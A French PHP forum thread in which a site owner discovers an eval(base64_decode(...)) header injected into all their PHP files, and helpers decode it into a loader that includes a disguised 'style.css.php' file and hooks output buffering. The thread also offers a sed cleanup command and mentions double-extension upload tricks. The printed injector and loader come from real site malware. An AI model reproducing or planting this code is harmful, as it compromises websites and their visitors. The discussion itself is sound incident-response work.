IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

Piratage ? fonction Eval


Sujet :

Langage PHP

  1. #1
    Membre régulier
    Profil pro
    Inscrit en
    Mars 2003
    Messages
    242
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Mars 2003
    Messages : 242
    Points : 108
    Points
    108
    Par défaut Piratage ? fonction Eval
    Bonjour,

    Je viens de m'apercevoir que chacun de mes fichiers php ont comme en-tete la chose suivante

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <?php /**/eval(b a s  e64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzUvZDI1MjY3NjAwMC9odGRvY3MvYXhlc3Mvc3RhdC9saWJzL2FydGljaG93L3BocDQvaW5jL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
    le "b a s e " est normalement sans espace ( j'en ai mis au cas où )

    Est ce qu'une personne sait d'où ceci peut venir, sachant que cela ne vient pas de moi ? Ce que c'est ? Est ce que j'ai une faille dans mon site ?
    Je vous remercie d'avance pour votre aide
    Cordialement

  2. #2
    Membre du Club
    Profil pro
    Inscrit en
    Mars 2004
    Messages
    46
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Mars 2004
    Messages : 46
    Points : 61
    Points
    61
    Par défaut
    effectivement cela ne sent pas bon. surtout qu'une fois décodé ca te donne bien du code php. Aprés il faut se demandé qui aimerait caché du code ? et qui aime nommé ces fonctions avec des nom du genre dgobh.

    Si j'etais toi je me renseignerais rapidement mais je pense qu'il faudrait peut-être penser a retirer cette ligne.

  3. #3
    Membre régulier
    Profil pro
    Inscrit en
    Mars 2003
    Messages
    242
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Mars 2003
    Messages : 242
    Points : 108
    Points
    108
    Par défaut
    J'ai deja retiré ces lignes... enfin oui et non, car, tous les fichiers du serveur sont impactés... Il y en a des centaines voir milliers....

    Je viens d'envoyer un e-mail à mon hébergeur pour savoir s'il avait des logs sur cela...

    De plus d'après ce que je lis dans ton post, tu as pu décoder le code ?
    Est ce que tu peux me copier le code ici ?

    J'aimerais savoir ce qu'il fait ce code...
    BFFFF C'est la merde....

    J'ai pu voir que peut être ca vient d'une de mes fonctions
    move_upload_file
    Alors que normalement je fais attention à l'extension...
    mais d'après ce que j'ai pu voir sur le web. il y en a qui envoi par exemple :
    script.php.jpg
    Donc voila...

    Si je déduis cela je devrais trouver quelque part sur le serveur un fichier de ce type, à moins qu'il l'ait effacé à la fin...

    Merci pour vos aides précieuses...
    A+

  4. #4
    Membre du Club
    Profil pro
    Inscrit en
    Mars 2004
    Messages
    46
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Mars 2004
    Messages : 46
    Points : 61
    Points
    61
    Par défaut
    la fonction base64decode sert a décodé.
    si tu remplaces le eval par un echo ca n'executera plus le code php mais ca te l'affichera a sur la page.

  5. #5
    Membre régulier
    Profil pro
    Inscrit en
    Mars 2003
    Messages
    242
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Mars 2003
    Messages : 242
    Points : 108
    Points
    108
    Par défaut
    Ok merci j'ai décodé le script...


    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn']))
    {$GLOBALS['mfsn']='/kunden/homepages/5/d252676000/htdocs/axess
    /stat/libs/artichow/php4/inc/style.css.php';if(file_exists($GLOBALS['mfsn']))
    {include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh'))
    {ob_start('dgobh');}}}
    J'ai regardé le fichier
    "axess/stat/libs/artichow/php4/inc/style.css.php"

    Est il est rempli de code ASCII, j'ai essayé de décoder mais ce dernier est codé doublement voir plus encore...

    Pour les stats de mon site j'utilise phpMyVisites qui se trouve donc dans le dossier /stat/...

    Est ce que c'est celui ci qui à une faille ?
    Si oui je vire directement tout le dossier...

    Si je supprime le dossier. Est ce que le script virus qui se trouve en en tete de chaque pages sera encore "actif" ?

    A plus

  6. #6
    Membre du Club
    Profil pro
    Inscrit en
    Mars 2004
    Messages
    46
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Mars 2004
    Messages : 46
    Points : 61
    Points
    61
    Par défaut
    c'est difficile de voir comme ca d'où vient la faille. il faut éplucher les logs afin de voir ce qui a été bizarre. tu devrais esayer de contacter les gens de phpmyvisites pour voir si ils savent quelque chose.

    à premiere vu si tu retire le fichier style.css.php tu devrais etre tranquil. car il fait un include de se fichier et n'enregistre la fonction dgobh que dans le cas ou l'include à ete effectué.

    ca devrait te soulager un moment. mais essais de creuser dans tes logs et/ou de te rapprocher de la communauté de phpmyvisites. car si tu ne corrige rien tu te retrouveras encore avec le même problème dans quelques temps.

  7. #7
    Membre régulier
    Profil pro
    Inscrit en
    Mars 2003
    Messages
    242
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Mars 2003
    Messages : 242
    Points : 108
    Points
    108
    Par défaut
    Oui j'ai déjà renommé le fichier de chez phpmyvisites...
    pour être plus ou moins tranquille....
    Bffff
    J'ai essayé de me connecter sur leur forum mais pas accès enfin bon c'est la M....
    Je te remercie en tout cas de ton aide.
    Je vais voir ce que je peux faire...

  8. #8
    Membre expert
    Avatar de s.n.a.f.u
    Homme Profil pro
    Développeur Web
    Inscrit en
    Août 2006
    Messages
    2 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 50
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Août 2006
    Messages : 2 760
    Points : 3 545
    Points
    3 545
    Par défaut
    Tu peux virer toutes ces entêtes pernicieuses à l'aide d'une commande bash du style
    Code bash : Sélectionner tout - Visualiser dans une fenêtre à part
    find . -name '*.php' -exec sed -i 's#<?php.*\?eval(base64_decode([^)]*));\s*?>#<?php //replaced ?>#g' {} \;
    ATTENTION : faire un backup et tester sans l'option -i !!!!!

  9. #9
    Membre régulier
    Profil pro
    Inscrit en
    Mars 2003
    Messages
    242
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Mars 2003
    Messages : 242
    Points : 108
    Points
    108
    Par défaut
    Ok je te remercie pour ta commande, elle pourra m'être bien utile.
    A bientot

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Fonction eval en java ?
    Par ramislebob dans le forum Langage
    Réponses: 2
    Dernier message: 12/01/2006, 00h22
  2. Parsage avec la fonction eval
    Par alain31tl dans le forum Langage
    Réponses: 12
    Dernier message: 23/11/2005, 15h27
  3. Simuler la fonction eval
    Par topwl dans le forum Général JavaScript
    Réponses: 13
    Dernier message: 26/08/2005, 01h44
  4. Existe-t-il une fonction Eval() sous Delphi ?
    Par Hell dans le forum Langage
    Réponses: 5
    Dernier message: 20/12/2004, 17h45
  5. [String] équivalent de la fonction eval() en javascript
    Par jeyce dans le forum API standards et tierces
    Réponses: 5
    Dernier message: 01/09/2004, 08h42

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo